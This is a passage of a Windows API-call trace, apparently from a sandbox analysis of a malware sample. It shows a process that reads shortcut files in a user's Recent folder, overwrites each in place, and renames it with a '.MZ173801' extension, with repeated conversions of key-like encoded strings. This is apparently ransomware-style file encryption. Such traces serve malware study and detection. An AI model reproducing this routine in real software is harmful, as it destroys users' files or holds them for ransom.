lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.344] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0107.344] GetCurrentThreadId () returned 0x1358 [0107.344] GetCurrentThreadId () returned 0x1358 [0107.344] GetCurrentThreadId () returned 0x1358 [0107.344] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a_IiCl.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\a_iicl.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.344] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0107.344] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.344] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x300 [0107.344] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.344] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x300, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x300, lpOverlapped=0x0) returned 1 [0107.345] CloseHandle (hObject=0x3f4) returned 1 [0107.345] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a_IiCl.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\a_iicl.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.346] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x300, lpOverlapped=0x0) returned 1 [0107.347] CloseHandle (hObject=0x3f4) returned 1 [0107.348] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a_IiCl.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\a_iicl.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a_IiCl.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\a_iicl.lnk.mz173801")) returned 1 [0107.348] GetCurrentThreadId () returned 0x1358 [0107.348] GetCurrentThreadId () returned 0x1358 [0107.348] GetCurrentThreadId () returned 0x1358 [0107.348] GetCurrentThreadId () returned 0x1358 [0107.348] GetCurrentThreadId () returned 0x1358 [0107.348] GetCurrentThreadId () returned 0x1358 [0107.348] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaa1c4ef, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeaa1c4ef, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeaa1c4ef, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x54c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="b79RtRRk9TDjgGdhgjZ.lnk", cAlternateFileName="B79RTR~1.LNK")) returned 1 [0107.348] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0107.349] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0107.349] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b79RtRRk9TDjgGdhgjZ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\b79rtrrk9tdjggdhgjz.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaa1c4ef, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeaa1c4ef, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeaa1c4ef, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x54c)) returned 1 [0107.349] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.349] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0107.349] GetCurrentThreadId () returned 0x1358 [0107.349] GetCurrentThreadId () returned 0x1358 [0107.349] GetCurrentThreadId () returned 0x1358 [0107.350] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.350] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0107.350] GetCurrentThreadId () returned 0x1358 [0107.350] GetCurrentThreadId () returned 0x1358 [0107.350] GetCurrentThreadId () returned 0x1358 [0107.350] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b79RtRRk9TDjgGdhgjZ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\b79rtrrk9tdjggdhgjz.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.350] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0107.350] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.350] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x54c [0107.350] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.350] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x54c, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x54c, lpOverlapped=0x0) returned 1 [0107.351] CloseHandle (hObject=0x3f4) returned 1 [0107.351] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b79RtRRk9TDjgGdhgjZ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\b79rtrrk9tdjggdhgjz.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.352] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x54c, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x54c, lpOverlapped=0x0) returned 1 [0107.353] CloseHandle (hObject=0x3f4) returned 1 [0107.354] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b79RtRRk9TDjgGdhgjZ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\b79rtrrk9tdjggdhgjz.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b79RtRRk9TDjgGdhgjZ.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\b79rtrrk9tdjggdhgjz.lnk.mz173801")) returned 1 [0107.354] GetCurrentThreadId () returned 0x1358 [0107.354] GetCurrentThreadId () returned 0x1358 [0107.354] GetCurrentThreadId () returned 0x1358 [0107.354] GetCurrentThreadId () returned 0x1358 [0107.354] GetCurrentThreadId () returned 0x1358 [0107.354] GetCurrentThreadId () returned 0x1358 [0107.354] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75f95315, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75f95315, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75f95315, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x473, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="BXHxcreN0NZMlQbLh4Mv.lnk", cAlternateFileName="BXHXCR~1.LNK")) returned 1 [0107.355] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0107.355] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0107.355] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BXHxcreN0NZMlQbLh4Mv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\bxhxcren0nzmlqblh4mv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75f95315, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75f95315, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75f95315, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x473)) returned 1 [0107.355] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.355] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 